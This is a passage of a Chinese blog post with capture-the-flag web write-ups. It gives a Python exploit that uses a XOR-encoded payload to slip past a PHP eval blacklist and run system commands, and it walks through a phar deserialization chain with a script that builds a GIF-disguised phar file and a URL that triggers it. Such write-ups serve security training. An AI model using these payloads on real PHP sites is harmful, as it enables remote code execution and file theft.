<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">$disable_fun = [<span class="string">&quot;assert&quot;</span>,<span class="string">&quot;print_r&quot;</span>,<span class="string">&quot;system&quot;</span>, <span class="string">&quot;shell_exec&quot;</span>,<span class="string">&quot;ini_set&quot;</span>, <span class="string">&quot;scandir&quot;</span>, <span class="string">&quot;exec&quot;</span>,<span class="string">&quot;proc_open&quot;</span>, <span class="string">&quot;error_log&quot;</span>, <span class="string">&quot;ini_alter&quot;</span>, <span class="string">&quot;ini_set&quot;</span>, <span class="string">&quot;pfsockopen&quot;</span>, <span class="string">&quot;readfile&quot;</span>, <span class="string">&quot;echo&quot;</span>, <span class="string">&quot;file_get_contents&quot;</span>, <span class="string">&quot;readlink&quot;</span>, <span class="string">&quot;symlink&quot;</span>, <span class="string">&quot;popen&quot;</span>, <span class="string">&quot;fopen&quot;</span>, <span class="string">&quot;file&quot;</span>, <span class="string">&quot;fpassthru&quot;</span>];</span><br><span class="line">$disable_fun = array_merge($disable_fun, get_defined_functions()[<span class="string">&#x27;internal&#x27;</span>]);</span><br><span class="line"><span class="keyword">foreach</span>($disable_fun <span class="keyword">as</span> $i)&#123;</span><br><span class="line">    <span class="keyword">if</span>(stristr($_GET[shell], $i)!==<span class="literal">false</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;xmctf&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">eval</span>($_GET[shell]);</span><br></pre></td></tr></table></figure>

<p>本题数组合并把一个数组的函数和php的内置函数一起作为黑名单，然后有个eval的参数是可以任意控制的，一看就知道用构造无字符去绕过了，这种题遇见过很多次了，随便拿个payload打打即可</p>
<p>这里直接给个exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8979/dhudndrgrhs.php&quot;</span></span><br><span class="line">payload = <span class="string">&#x27;?shell=$&#123;%a0%b8%ba%ab^%ff%ff%ff%ff&#125;&#123;%ff&#125;($&#123;%a0%b8%ba%ab^%ff%ff%ff%ff&#125;&#123;%a0&#125;);&amp;%ff=system&amp;%a0=cat flag.php&#x27;</span></span><br><span class="line">response = r.get(url+payload)</span><br><span class="line">print(response.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217134249722.png" alt="image-20201217134249722"></p>
<h3 id="web6-考核"><a href="#web6-考核" class="headerlink" title="web6-考核"></a>web6-考核</h3><p>看到页面有个<code>download.php</code>，扫描目录有个<code>class.php</code>，但是有个正则过滤了class，用斜杠绕过即可下载下来，源码如下</p>
<p><code>class.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $source;</span><br><span class="line">    <span class="keyword">public</span> $str;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $text= <span class="keyword">$this</span>-&gt;source;</span><br><span class="line">        $text = base64_encode(file_get_contents($text));</span><br><span class="line">        <span class="keyword">return</span> $text;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $text= <span class="keyword">$this</span>-&gt;source;</span><br><span class="line">        $text = base64_encode(file_get_contents($text));</span><br><span class="line">        <span class="keyword">return</span> $text;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params">$key,$value</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;$key = $value;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">_show</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/http|https|file:|gopher|dict|\.\.|flag/i&#x27;</span>,<span class="keyword">$this</span>-&gt;source)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;hacker!&#x27;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            highlight_file(<span class="keyword">$this</span>-&gt;source);</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/http|https|file:|gopher|dict|\.\./i&quot;</span>, <span class="keyword">$this</span>-&gt;source)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;hacker~&quot;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;source = <span class="string">&quot;index.php&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">S6ow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $file;</span><br><span class="line">    <span class="keyword">public</span> $params;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;params = <span class="keyword">array</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params">$key</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;params[$key];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params">$name, $arguments</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;&#123;$name&#125;)</span><br><span class="line">            <span class="keyword">$this</span>-&gt;&#123;<span class="keyword">$this</span>-&gt;&#123;$name&#125;&#125;($arguments);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">file_get</span>(<span class="params">$value</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;file;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Sh0w</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $test;</span><br><span class="line">    <span class="keyword">public</span> $str;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$name</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;str = <span class="keyword">new</span> Show(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;str-&gt;source = <span class="keyword">$this</span>-&gt;test;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;str-&gt;_show();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>又找到有个<code>file.php</code>，看到有个<code>file_exists</code>，这个函数可以使用phar协议，然后又有文件上传，满足这几个条件的话phar反序列化八九不离十了，主要是怎么构造反序列化的链条</p>
<p>这里首先看到Show类<code>__toString</code>方法里面有个<code>file_get_contents</code>可以读取文件，这个地方应该是链条的终点，然后调用<code>__toString</code>方法的话一般是<code>echo</code>对象或者字符串对比啥的，然后看到S6ow类有个<code>file_get</code>里面有个<code>echo</code>，这里可以调用<code>__toString</code>方法，然后就要想办法调用<code>file_get</code></p>
<p>这里可以先看到有个<code>__call</code>和<code>__get</code>，可以通过<code>__get</code>去调用<code>file_get</code>，然后调用<code>__get</code>需要不可访问的变量，这时候可以用<code>__call</code>去触发，最后在<code>__call</code>的调用需要用到<code>Sh0w</code>的<code>__destruct</code>中访问<code>_show()</code>，我们可以设置str为S6ow，而S6ow缺少<code>_show()</code>方法从而调用<code>__call</code></p>
<p>链条加上生成phar文件的payload为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $source;</span><br><span class="line">    <span class="keyword">public</span> $str;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;source = <span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">S6ow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $file;</span><br><span class="line">    <span class="keyword">public</span> $params;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;file=<span class="keyword">new</span> Show();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;params[<span class="string">&#x27;_show&#x27;</span>]=<span class="string">&#x27;file_get&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Sh0w</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $test;</span><br><span class="line">    <span class="keyword">public</span> $str;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;str = <span class="keyword">new</span> s6ow();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">$Sh0w = <span class="keyword">new</span> Sh0w();</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">&quot;phar.phar&quot;</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">&quot;GIF89a&quot;</span>.<span class="string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>); <span class="comment">//设置stub</span></span><br><span class="line">$phar-&gt;setMetadata($Sh0w); <span class="comment">//将自定义的meta-data存入manifest</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">&quot;test.txt&quot;</span>, <span class="string">&quot;test&quot;</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line"><span class="comment">//签名自动计算</span></span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后将生成的<code>phar.phar</code>重命名为<code>phar.jpg</code>上传，计算一下md5值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> md5(<span class="string">&#x27;phar.jpg&#x27;</span>);<span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//628941e623f5a967093007bf39be805f</span></span><br></pre></td></tr></table></figure>

<p>最后在<code>file.php</code>用phar协议去触发我们的反序列化即可，payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xmctf.top:8874&#x2F;file.php?file&#x3D;phar:&#x2F;&#x2F;upload&#x2F;628941e623f5a967093007bf39be805f.jpg</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217191850645.png" alt="image-20201217191850645"></p>
<p>base64解码之后即可得到flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xmctf&#123;ph4r_s3r1al1z3_1s_fu9!&#125;</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/11/19/%E6%B5%B7%E5%95%B8%E6%9D%AF/" rel="prev" title="第三届海啸杯">
      <i class="fa fa-chevron-left"></i> 第三届海啸杯
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/09/08/WMCTF%202021/" rel="next" title="WMCTF 2021">
      WMCTF 2021 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#web3-%E8%80%83%E6%A0%B8"><span class="nav-number">1.</span> <span class="nav-text">web3-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#RCE-%E8%AE%AD%E7%BB%83"><span class="nav-number">2.</span> <span class="nav-text">RCE-训练</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easy-web-%E8%80%83%E6%A0%B8"><span class="nav-number">3.</span> <span class="nav-text">easy-web-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web8-%E8%80%83%E6%A0%B8"><span class="nav-number">4.</span> <span class="nav-text">web8-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web11-%E8%80%83%E6%A0%B8"><span class="nav-number">5.</span> <span class="nav-text">web11-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web12-%E8%80%83%E6%A0%B8"><span class="nav-number">6.</span> <span class="nav-text">web12-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web4-%E8%80%83%E6%A0%B8"><span class="nav-number">7.</span> <span class="nav-text">web4-考核</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web6-%E8%80%83%E6%A0%B8"><span class="nav-number">8.</span> <span class="nav-text">web6-考核</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="kawhi"
      src="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
  <p class="site-author-name" itemprop="name">kawhi</p>
  <div class="site-description" itemprop="description">随笔、分享、记录生活</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://47.98.234.232:8000/" title="http:&#x2F;&#x2F;47.98.234.232:8000&#x2F;" rel="noopener" target="_blank">G2mtu备用靶场</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://kawhi.gearhostpreview.com/" title="http:&#x2F;&#x2F;kawhi.gearhostpreview.com&#x2F;" rel="noopener" target="_blank">OneDrive网盘</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kawhi</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">128k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:56</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
